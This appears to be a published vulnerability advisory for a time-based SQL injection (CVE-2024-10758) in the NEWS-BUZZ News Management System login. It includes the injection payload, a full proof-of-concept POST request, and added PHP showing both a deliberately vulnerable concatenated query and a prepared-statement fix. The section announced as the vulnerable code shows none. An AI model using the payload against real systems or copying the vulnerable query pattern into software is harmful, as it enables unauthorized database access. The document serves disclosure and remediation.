# Exploit Title: NEWS-BUZZ News Management System 1.0 - SQL Injection
# Google Dork: N/A
# Exploit Author: egsec
# Date: 2024-11-03
# Vendor Homepage: https://code-projects.org
# Software Link: https://code-projects.org/content-management-system-in-php-with-source-code-2/
# Version: 1.0
# Tested on: Windows 11 Pro
# Impact: Manipulation of the user_name argument with crafted input leads to a SQL injection vulnerability
# CVE : CVE-2024-10758

## Vulnerability Description:

There is a SQL injection vulnerability in the login handling reached from the index.php file. It allows an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.

## Vulnerable code section:

In the source code, the vulnerable code is in the NEWS-BUZZ/login.php file:

In this line, the $username variable is embedded directly into the SQL query string without parameterization or escaping. This allows an attacker to inject SQL code through the user_name form field.

## Proof of Concept (PoC):

1. Location: http://localhost/NEWS-BUZZ/index.php

2. Time-Based SQL Injection Payload: ' OR sleep(10)#

3. PoC request:

POST /NEWS-BUZZ/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: http://localhost
Connection: close
Referer: http://localhost/NEWS-BUZZ/index.php
Cookie: PHPSESSID=456n0gcbd6d09ecem39lrh3nu9
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

user_name=admin%27+or+sleep%2810%29%23&user_password=adminpass&login=

4. PoC response: The response is delayed by the number of seconds passed to sleep() (10 seconds here), which confirms that the injected SQL was executed by the database.
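The following is an added illustration of the defect described above and of the fix a maintainer would apply; it is not code from the NEWS-BUZZ project. It assumes a mysqli connection in $conn, a users table with user_name and user_password columns (the column names are guessed from the POST field names in the PoC request), and that stored passwords are password_hash() digests. The first function reproduces the string-concatenation pattern the advisory describes; the second uses a prepared statement so that the query structure is fixed before any user input is bound.

```php
<?php
// Added example, not the project's own code. Assumed: $conn is a mysqli
// connection; table `users` has columns `user_name` and `user_password`.

// Vulnerable pattern: the submitted username is spliced into the query text.
// Input such as the advisory's payload (' OR sleep(10)#) changes the WHERE
// clause itself, so the database runs attacker-chosen SQL.
function login_vulnerable(mysqli $conn, string $username, string $password): bool
{
    $sql = "SELECT * FROM users WHERE user_name = '$username' AND user_password = '$password'";
    $result = $conn->query($sql);
    return $result !== false && $result->num_rows > 0;
}

// Hardened pattern: the username is bound as a parameter, so it can only ever
// be compared as a value; the password never enters the SQL at all and is
// checked against the stored password_hash() digest with password_verify().
function login_safe(mysqli $conn, string $username, string $password): bool
{
    $stmt = $conn->prepare("SELECT user_password FROM users WHERE user_name = ? LIMIT 1");
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    if (!$row) {
        return false;
    }
    return password_verify($password, $row['user_password']);
}

// Usage as it would sit at the top of login.php. Field names are taken from
// the advisory's PoC request; connection parameters are placeholders.
session_start();
$conn = new mysqli('localhost', 'DB_USER_PLACEHOLDER', 'DB_PASS_PLACEHOLDER', 'DB_NAME_PLACEHOLDER');
$username = $_POST['user_name'] ?? '';
$password = $_POST['user_password'] ?? '';

if (login_safe($conn, $username, $password)) {
    session_regenerate_id(true);      // new session id after a privilege change
    $_SESSION['user'] = $username;
    header('Location: /NEWS-BUZZ/index.php');
} else {
    http_response_code(401);
    echo 'Invalid credentials';
}
```

With login_safe(), the PoC payload is simply compared against the user_name column as a literal string and no matching row is found, so there is no delay and no error: that absence of any timing difference between a normal and a crafted username is also the check a tester would use to confirm the fix.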